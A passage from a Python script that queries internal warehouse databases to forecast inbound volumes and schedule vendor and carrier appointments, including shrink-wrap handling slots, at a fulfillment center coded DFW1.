>= current_date AND iblm.wh_id = 'DFW1'\r\n order by wh_id, date;\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['fc_nm','update_dttm','date','units','day_units','night_units']\r\n f = dict([str(i),[float(j),float(k)]] for i,j,k in zip(df.date,df.day_units,df.night_units))\r\n \r\n# =============================================================================\r\n# query = \"\"\"\r\n# SELECT common_date_dttm, forecast_percent\r\n# FROM sandbox_supply_chain.daily_inbound_forecast_percent\r\n# WHERE common_date_dttm between current_date-7 and current_date+123 AND location = 'DFW1'\r\n# ORDER BY 1\r\n# \"\"\"\r\n# #cur.execute(query)\r\n# #result = cur.fetchall()\r\n# #df = pd.DataFrame(data = result)\r\n# df = pd.read_sql(query,cxn)\r\n# df.columns = ['date','units']\r\n# temp_perc = dict([i,float(j)] for i,j in zip(df.date,df.units))\r\n# f = {}\r\n# f_sch = {}\r\n# for i in temp_f.keys():\r\n# k = 0\r\n# while k < 5:\r\n# a = i + dtm.timedelta(days = k+1)\r\n# if a in temp_perc:\r\n# f[str(a)] = temp_perc[a] * temp_f[i]\r\n# else:\r\n# f[str(a)] = 0.2* temp_f[i]\r\n# k = k+1\r\n# =============================================================================\r\n logger.info(\"Forecast data is collected\") \r\n\r\n \r\n cnt = 1\r\n for i in range(1,108):\r\n a = today + dtm.timedelta(days = i-1)\r\n if 1 <= cnt <= 3:\r\n if str(a) in f:\r\n f[str(a)][0] = 1 * f[str(a)][0]\r\n f[str(a)][1] = 1 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n \r\n elif 4 <= cnt <= 6:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.9 * f[str(a)][0]\r\n f[str(a)][1] = 0.9 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 7 <= cnt <= 9:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.8 * f[str(a)][0]\r\n f[str(a)][1] = 0.8 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 10 <= cnt <= 12:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.7 * f[str(a)][0]\r\n f[str(a)][1] = 0.7 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 13 <= cnt <= 15:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.6 * f[str(a)][0]\r\n f[str(a)][1] = 0.6 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 16 <= cnt <= 18:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.5 * f[str(a)][0]\r\n f[str(a)][1] = 0.5 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n else:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.4 * f[str(a)][0]\r\n f[str(a)][1] = 0.4 * f[str(a)][1]\r\n else:\r\n pass\r\n logger.info(\"Added Dynamic weights to the S&OP forecast\")\r\n \r\n #getting vas_units\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, sum(pdp.qty)\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','vas_units']\r\n sch_vas = dict([str(i),int(j)] for i,j in zip(df.date,df.vas_units))\r\n \r\n vas_dt = []\r\n \r\n for i in sch_vas.keys():\r\n if sch_vas[i] > 6000:\r\n vas_dt.append(i)\r\n else:\r\n pass\r\n \r\n #getting vas units by shift\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE,CASE WHEN apl.request_time:: TIME BETWEEN '04:00:00' AND '14:30:00' THEN 1 ELSE 2 END AS shift, SUM(pdp.qty) AS vas_units\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','sh','vas_units']\r\n sch_vas_sh = dict([(str(i),str(j)),float(k)] for i,j,k in zip(df.dt,df.sh,df.vas_units))\r\n \r\n for (i,j) in sch_vas_sh.keys():\r\n if sch_vas_sh[(i,j)] > 3000:\r\n vas_dt.append((i,j))\r\n else:\r\n pass\r\n #getting and initializing vas slot\r\n query = \"\"\"\r\n SELECT DISTINCT apl.request_date:: DATE,request_time:: TIME, CASE WHEN p.product_vas_profile_description IN ('SHRINKWRAP') THEN 1 ELSE 0 END vas_slot\r\n FROM aad.t_appt_appointment_log AS apl\r\n LEFT JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n LEFT JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n LEFT JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','time','vas_flag']\r\n sch_vas_fl = dict([(str(i),str(j)),str(k)] for i,j,k in zip(df.date,df.time,df.vas_flag))\r\n \r\n temp_fl = sch_vas_fl.copy()\r\n for (i,j) in temp_fl.keys():\r\n gh = 0\r\n for k in sorted(day_slots[date_fl[i]]):\r\n if j == k and temp_fl[(i,j)] == '1' and gh != 0 and gh != len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[i]]):\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[i]]):\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n \r\n for (i,j) in temp_fl.keys():\r\n gh = 0\r\n if date_fl[i] == '0':\r\n for k in sorted(night_slots[date_fl[i]]):\r\n if j == k and temp_fl[(i,j)] == '1' and gh != 0 and gh != len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[i]]):\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[i]]):\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n else:\r\n pass\r\n logger.info(\"VAS data is collected and slots are initialized\") \r\n #getting input data from carrier portal\r\n query = \"\"\"\r\n WITH data2 AS \r\n (\r\n SELECT cpl.PO_no AS document_number,MAX(cpl.Ref_no) AS reference_number , MAX(cpl.VRDD:: DATE) AS requested_appt_date , MAX(cpl.Created_dt) AS created_dttm\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n WHERE cpl.FC_nm = 'DFW1' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n AND cpl.Ref_no NOT IN (SELECT Ref_no FROM sandbox_supply_chain.iso_exception)\r\n AND cpl.Ref_no <> '190922-029070'\r\n GROUP BY 1\r\n )\r\n ,data AS\r\n (\r\n SELECT d1.reference_number AS Ref_no, CASE WHEN DAYOFWEEK(d1.requested_appt_date) = 7 THEN d1.requested_appt_date+2 WHEN DAYOFWEEK(d1.requested_appt_date) = 1 THEN d1.requested_appt_date+1 ELSE d1.requested_appt_date END AS VRDD1, d1.document_number AS PO_no,d1.created_dttm AS cr_dt,cpl.carrier_scac AS sc,cpl.carrier_name AS csr\r\n FROM data2 AS d1\r\n JOIN sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n ON d1.reference_number = cpl.Ref_no AND cpl.PO_no = d1.document_number\r\n )\r\n , parameters AS\r\n (\r\n SELECT d.Ref_no, SUM(pdp.qty) AS IB_units, COUNT(DISTINCT pdp.item_number) AS sku, \r\n CASE\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 61 THEN 1\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 51 THEN 2\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 41 THEN 3\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 21 THEN 4\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) <= 21 THEN 5\r\n END as high_jump_rank,COUNT(DISTINCT pdp.po_number) AS po_count \r\n FROM data AS d\r\n JOIN aad.t_po_detail AS pdp\r\n ON d.PO_no = pdp.po_number\r\n GROUP BY 1\r\n )\r\n ,obj1 AS \r\n (\r\n SELECT d.Ref_no, AVG(DATEDIFF(day,pdpm.document_original_requested_delivery_dttm,d.VRDD1)) AS obj\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_product_measures AS pdpm\r\n ON d.PO_no = pdpm.document_number\r\n GROUP BY 1\r\n ) \r\n ,obj AS \r\n (\r\n SELECT Ref_no, CASE WHEN obj IS NULL THEN 0 ELSE obj END AS obj\r\n FROM obj1\r\n )\r\n ,vas_parameters AS\r\n (\r\n SELECT d.Ref_no,sum(pdp.qty) AS vas_units\r\n FROM data AS d\r\n JOIN aad.t_po_detail AS pdp\r\n ON d.PO_no = pdp.po_number\r\n JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number \r\n WHERE p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') \r\n GROUP BY 1\r\n )\r\n \r\n ,cont_flag AS\r\n (\r\n SELECT DISTINCT d.Ref_no, d.VRDD1,\r\n CASE WHEN v.vendor_number IN ('P000533','B000050','1760','9295','9302','P000544','P000508','P000486','P000400','7701','P000398','B000064','P000421','P000476','3755','3722','8038','5223') THEN 3\r\n ELSE NULL \r\n END AS cont_flag\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON d.PO_no = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n USING (vendor_key)\r\n )\r\n ,cont_fl AS\r\n (\r\n SELECT * , ROW_NUMBER() OVER (PARTITION BY VRDD1) AS rank\r\n FROM cont_flag\r\n WHERE cont_flag IS NOT NULL\r\n )\r\n ,stand_appt AS\r\n (\r\n SELECT DISTINCT d.Ref_no,d.PO_no,d.VRDD1,d.cr_dt,\r\n CASE WHEN LOWER(d.csr) LIKE 'estes%' THEN '000000012'\r\n WHEN LOWER(d.csr) LIKE 'yrc%' THEN '00000007'\r\n WHEN LOWER(d.csr) LIKE 'saia%' THEN '00000004'\r\n WHEN LOWER(d.csr) LIKE 'fedex%' THEN '9000'\r\n WHEN LOWER(d.csr) LIKE 'ups%' THEN '00000002'\r\n ELSE v.vendor_number END as vendor_number ,v.vendor_name\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON d.PO_no = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n ON pdm.vendor_key = v.vendor_key\r\n )\r\n ,stand_slot AS\r\n (\r\n SELECT Ref_no,PO_no, VRDD1,vendor_number,cr_dt, ROW_NUMBER() OVER(PARTITION BY VRDD1,vendor_number) AS rank\r\n FROM stand_appt\r\n WHERE stand_flag = 1\r\n ORDER BY VRDD1\r\n )\r\n ,vas_final AS \r\n (\r\n SELECT d.Ref_no, CASE WHEN vp.vas_units IS NULL THEN 0 ELSE vp.vas_units END AS vas_units\r\n FROM data AS d\r\n LEFT JOIN vas_parameters AS vp\r\n ON vp.Ref_no = d.Ref_no\r\n ) \r\n SELECT d.Ref_no,d.VRDD1 AS VRDD, \r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2,3,4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) = 1 AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj + 1 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) = 7 AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj+2 AS DATE) ELSE CAST(d.VRDD1 AS DATE) END AS VRDD1, \r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (3,4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-1 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2,7,1) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-3 AS DATE) \r\n WHEN p1.obj >= -1 AND DAYOFWEEK(d.VRDD1) = 6 AND c.cont_flag IS NULL THEN CAST(d.VRDD1+3 AS DATE) \r\n WHEN c.cont_flag IS NOT NULL AND DAYOFWEEK(d.VRDD1) = 6 THEN CAST(d.VRDD1+3 AS DATE) ELSE CAST(d.VRDD1+1 AS DATE) END AS VRDD2,\r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) <> 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-2 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) <> 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (1,2,3,7) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-4 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-2 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (1,3,7) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-4 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND c.cont_flag IS NULL AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2) THEN CAST(d.VRDD1+4 AS DATE)\r\n WHEN p1.obj >= -1 AND DAYOFWEEK(d.VRDD1) IN (5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1+4 AS DATE) \r\n WHEN c.cont_flag IS NOT NULL AND DAYOFWEEK(d.VRDD1) IN (5,6) THEN CAST(d.VRDD1+4 AS DATE) ELSE CAST(d.VRDD1+2 AS DATE) END AS VRDD3,\r\n p.IB_units, p.sku,p1.obj, p.high_jump_rank,c.cont_flag,\r\n CASE WHEN c.cont_flag IS NULL AND p.po_count <= 1 AND p.high_jump_rank IN (1,2,3,4) THEN 0 ELSE 1 END AS UPT,d.cr_dt,sa.vendor_number,sa.vendor_name,vl.vas_units\r\n ,CASE WHEN vl.vas_units > 0 THEN 1 ELSE 0 END AS vas_flag,d.csr\r\n FROM data AS d\r\n JOIN parameters AS p\r\n ON d.Ref_no = p.Ref_no\r\n JOIN cont_flag AS c\r\n ON p.Ref_no = c.Ref_no\r\n JOIN stand_appt AS sa\r\n ON c.Ref_no = sa.Ref_no and d.PO_no = sa.PO_no\r\n JOIN obj AS p1\r\n ON p1.Ref_no = d.Ref_no\r\n LEFT JOIN vas_final AS vl\r\n ON vl.Ref_no = d.Ref_no;\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['appt_id','vrdd','vrdd1','vrdd2','vrdd3','units','sku','obj','high_jump_rank','con_fl','upt','cr_dt','vendor','vendor_name','vas_units','vas_flag','carrier_name']\r\n dt1 = dict([(str(i),[str(j),str(k),str(l)]) for i,j,k,l in zip(df.appt_id,df.vrdd1,df.vrdd2,df.vrdd3)])\r\n #st_fl = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.st_fl))\r\n cont_fl = {str(k):g['appt_id'] for k,g in df.groupby('con_fl')}\r\n cnt_fl = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.con_fl))\r\n vendor = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vendor))\r\n units_sku_obj = dict([(str(i),[int(j),int(k),float(l)]) for i,j,k,l in zip(df.appt_id,df.units,df.sku,df.obj)])\r\n b = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.upt))\r\n cr_dt = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.cr_dt))\r\n v_name = dict([str(i),str(j).replace(',',';')] for i,j in zip(df.appt_id,df.vendor_name))\r\n vas_units = dict([str(i),int(j)] for i,j in zip(df.appt_id,df.vas_units))\r\n vas_flag = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vas_flag))\r\n hj_rank = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.high_jump_rank))\r\n csr = dict([str(i),str(j).replace(',',';')] for i,j in zip(df.appt_id,df.carrier_name))\r\n vrdd = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vrdd))\r\n logger.info(\"Getting Carrier Portal Data\")\r\n date = str(dtm.datetime.today().date())\r\n dt = {}\r\n for i in dt1.keys():\r\n cnt = 0 \r\n for j in dt1[i]:\r\n if j < date:\r\n pass\r\n else:\r\n if i in dt:\r\n dt[i].append(j)\r\n else:\r\n dt[i] = [j]\r\n \r\n #po_number\r\n query = \"\"\"\r\n SELECT cpl.Ref_no,pdp.po_number, SUM(pdp.qty), COUNT(DISTINCT pdp.item_number)\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n JOIN aad.t_po_detail AS pdp\r\n ON cpl.PO_no = pdp.po_number\r\n WHERE cpl.FC_nm = 'DFW1' AND UPPER(cpl.request_type) LIKE 'CREATE%' AND cpl.VRDD:: DATE >= '20190701' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n GROUP BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['ref','po','units','sku']\r\n ref_num = {str(k):g['po'].unique().tolist()for k,g in df.groupby('ref')}\r\n po = dict([(str(i),str(j)),[int(k),int(l)]] for i,j,k,l in zip(df.ref,df.po,df.units,df.sku))\r\n \r\n query = \"\"\"\r\n SELECT cpl.Incident_No,cpl.Ref_no,pdp.document_number,ISNULL(pdp.document_original_requested_delivery_dttm:: DATE,'1900-01-01')\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n JOIN chewybi.procurement_document_measures AS pdp\r\n ON cpl.PO_no = pdp.document_number\r\n WHERE cpl.FC_nm = 'DFW1' AND UPPER(cpl.request_type) LIKE 'CREATE%' AND cpl.VRDD:: DATE >= '20190701' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['inc','ref','po','ordd']\r\n ordd = dict([str(i),str(j)] for i,j in zip(df.po,df.ordd))\r\n inc = dict([str(i),str(j)] for i,j in zip(df.ref,df.inc))\r\n \r\n logger.info(\"Getting PO details in terms of units,sku and ORDD\")\r\n #cont_appt_scheduled\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, COUNT(DISTINCT apl.appointment_id)\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n ON apl.appointment_id = pol.appointment_id\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON pol.po_number = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n ON pdm.vendor_key = v.vendor_key\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE >= '2019-07-01' AND v.vendor_number IN ('P000533','B000050','1760','9295','9302','P000544','P000508','P000486','P000400','7701','P000398','B000064','P000421','P000476','3755','3722','8038','5223')\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n if df.empty == False: \r\n df.columns = ['date','cnt']\r\n cont_appt = dict([str(i),2-int(j)] for i,j in zip(df.date,df.cnt))\r\n else:\r\n cont_appt = {}\r\n logger.info(\"Getting Container appointments data\")\r\n #reschedules\r\n query = \"\"\"\r\n WITH data AS (SELECT cpl.Ref_no, cpl.VRDD:: DATE, cpl.Created_dt:: DATE,pdm.document_number\r\n FROM chewybi.procurement_document_measures AS pdm\r\n JOIN sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n ON cpl.PO_no = pdm.document_number\r\n WHERE cpl.FC_nm = 'DFW1' AND cpl.Ref_no NOT IN (SELECT Ref_no FROM sandbox_supply_chain.iso_exception) AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n )\r\n SELECT d.Ref_no,apl.appointment_id,apl.request_date:: DATE, request_time:: TIME, d.document_number\r\n FROM data AS d\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n ON d.document_number = pol.po_number\r\n JOIN aad.t_appt_appointment_log AS apl\r\n ON apl.appointment_id = pol.appointment_id\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n rsch = {}\r\n if df.empty == False:\r\n df.columns = ['reference_number','appointment_id','Date','Time','PO_number']\r\n rsch = dict([(str(i),str(j)),[str(k),str(l)]] for i,j,k,l in zip(df.appointment_id,df.PO_number,df.Date,df.Time))\r\n \r\n else:\r\n pass\r\n logger.info(\"Getting Reschedule appointment data\")\r\n \r\n #scheduling standing appointment\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, apl.request_time:: TIME, apl.vendor\r\n FROM aad.t_appt_appointment_log AS apl\r\n LEFT JOIN aad.t_appt_appointment_log AS pol\r\n USING(appointment_id)\r\n WHERE apl.request_date:: DATE BETWEEN current_date+1 AND current_date+60 AND LOWER(apl.status) <> 'cancelled' AND apl.standing_appt_id IS NOT NULL AND apl.vendor IS NOT NULL AND apl.wh_id = 'DFW1' AND pol.po_number IS NULL AND dayofweek(apl.request_date) NOT IN (1,7)\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','tm','vendor']\r\n stnd_date = {str(k):g['dt'].unique().tolist() for k,g in df.groupby('vendor')}\r\n stnd_time = {str(k):g['tm'].unique().tolist()for k,g in df.groupby('vendor')}\r\n stnd_fl = dict([(str(i),str(j),str(k)),'0'] for i,j,k in zip(df.dt,df.tm,df.vendor))\r\n \r\n for i in stnd_date.keys():\r\n for j in range(1,len(stnd_date[i])+1):\r\n stnd_date[i][j-1] = str(stnd_date[i][j-1])\r\n for k in range(1,len(stnd_time[i])+1):\r\n stnd_time[i][k-1] = str(stnd_time[i][k-1])\r\n \r\n #standing appointment_vendor_units \r\n query = \"\"\"\r\n with standings_history as (\r\n select distinct poq.\"Location Code\",poq.appt_date,poq.No_,poq.standing_appt_id,poq.\"Buy-from Vendor No_\",poq.appt_quantity_fill,sum(pdm.document_receipt_hj_quantity) as received_units,count(pdm.product_part_number) as SKU_count\r\n from sandbox_supply_chain.scheduled_po_quantity poq \r\n left join chewybi.procurement_document_product_measures pdm on pdm.document_number = poq.No_ and poq.appt_date::date = pdm.appointment_dttm::date\r\n where poq.appt_date >= timestampadd('month',-3,current_date)\r\n and standing_appt_id is not null\r\n group by 1,2,3,4,5,6)\r\n \r\n ,standings_schedule as (\r\n select distinct wh_id, standing_appt_id, request_time:: TIME AS scheduled_time, date_part('dow',request_date) as dow, vendor, vendor_name, units_expected\r\n from aad.t_appt_appointment_log aal left join chewybi.vendors v on aal.vendor = v.vendor_number\r\n where standing_appt_id is not null and units_expected is not null and request_date::date > current_date)\r\n \r\n ,final AS (\r\n select ss.wh_id,\r\n ss.dow,\r\n ss.scheduled_time,\r\n ss.standing_appt_id,\r\n vendor,\r\n --case vendor\r\n --when '00000004' then 'SAIA LTL'\r\n --when '00000007' then 'YRC LTL'\r\n --when '00000002' then 'UPS LTL'\r\n --when '000000012' then 'ESTES LTL'\r\n --when '9000' then 'FEDEX LTL'\r\n --else vendor_name end as vendor_or_carrier,\r\n ss.units_expected as units_expected,\r\n sum(sh.appt_quantity_fill)/count(distinct sh.appt_date::date) as scheduled_units_per_day,\r\n isnull(sum(sh.received_units)/nullif(sum(sh.SKU_count),0),0) as UPT\r\n from standings_schedule ss \r\n join standings_history sh \r\n on ss.wh_id = sh.\"Location Code\" \r\n and ss.dow = date_part('dow',sh.appt_date) \r\n and ss.standing_appt_id = sh.standing_appt_id\r\n where vendor not in ('AVP1','CFC1','DAY1','DFW1','EFC3','MCO1','PHX1','WFC2') and ss.wh_id = 'DFW1'\r\n group by 1,2,3,4,5,6\r\n order by 1,4,2\r\n )\r\n SELECT vendor, CASE WHEN dow <> 5 AND scheduled_time BETWEEN '04:00:00' AND '15:30:00' THEN 1 WHEN dow = 5 AND scheduled_time BETWEEN '04:00:00' AND '16:00:00' THEN 1 ELSE 2 END AS shift, ROUND(AVG(scheduled_units_per_day),0) AS Units, ROUND((AVG(scheduled_units_per_day) /AVG(UPT)),0) AS SKU\r\n FROM final\r\n GROUP BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['y','x','r','t']\r\n v_units = dict([(str(i),str(j)),[float(k),float(l)]] for i,j,k,l in zip(df.y,df.x,df.r,df.t))\r\n logger.info(\"Getting Standing Appointment Data\")\r\n query = \"\"\"\r\n WITH break AS \r\n (\r\n SELECT apl.appointment_id,apl.request_date:: DATE, apl.request_time:: TIME,COUNT(DISTINCT pol.po_number) AS po_count, (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) AS hj_rank\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n WHERE apl.status <> 'Cancelled' AND apl.request_date:: DATE BETWEEN current_date AND current_date+60 AND apl.wh_id = 'DFW1'\r\n GROUP BY 1,2,3\r\n ORDER BY 1,2\r\n )\r\n ,break_final AS \r\n ( \r\n SELECT appointment_id,request_date,request_time, CASE WHEN po_count > 1 or hj_rank < 35 THEN 1 ELSE 0 END AS bulk_or_breakdown\r\n FROM break\r\n ORDER BY 2,3\r\n )\r\n SELECT request_date,request_time,bulk_or_breakdown\r\n FROM break_final\r\n WHERE bulk_or_breakdown = 1\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['Dt','tm','bi']\r\n temp_bulk = dict([(str(i),str(j)),str(k)] for i,j,k in zip(df.Dt,df.tm,df.bi))\r\n logger.info(\"Initializing breakdown slots\")\r\n \r\n ref = {}\r\n units = {}\r\n slot = {}\r\n #scheduling stand_appointments\r\n for j in dt.keys():\r\n for k in dt[j]:\r\n if k in ref:\r\n ref[k].append(j)\r\n else:\r\n ref[k] = [j]\r\n \r\n for j in ref.keys():\r\n if j in sch_dict:\r\n pass\r\n #sch_dict[j] = [0,0,0]\r\n else:\r\n sch_dict[j] = [0,0,0]\r\n for j in sch_dict.keys():\r\n for k in range(1,3):\r\n if (j,str(k)) in sch_sh:\r\n pass\r\n #sch_sh[(j,str(k))] = [0,0,0]\r\n else:\r\n sch_sh[(j,str(k))] = [0,0,0]\r\n for j in sch_dict.keys():\r\n for k in day_slots[date_fl[j]]:\r\n if (j,k) in sch_slot:\r\n pass\r\n #sch_slot[(j,k)] = 0\r\n else:\r\n sch_slot[(j,k)] = 0\r\n for k in night_slots[date_fl[j]]:\r\n if (j,k) in sch_slot:\r\n pass\r\n 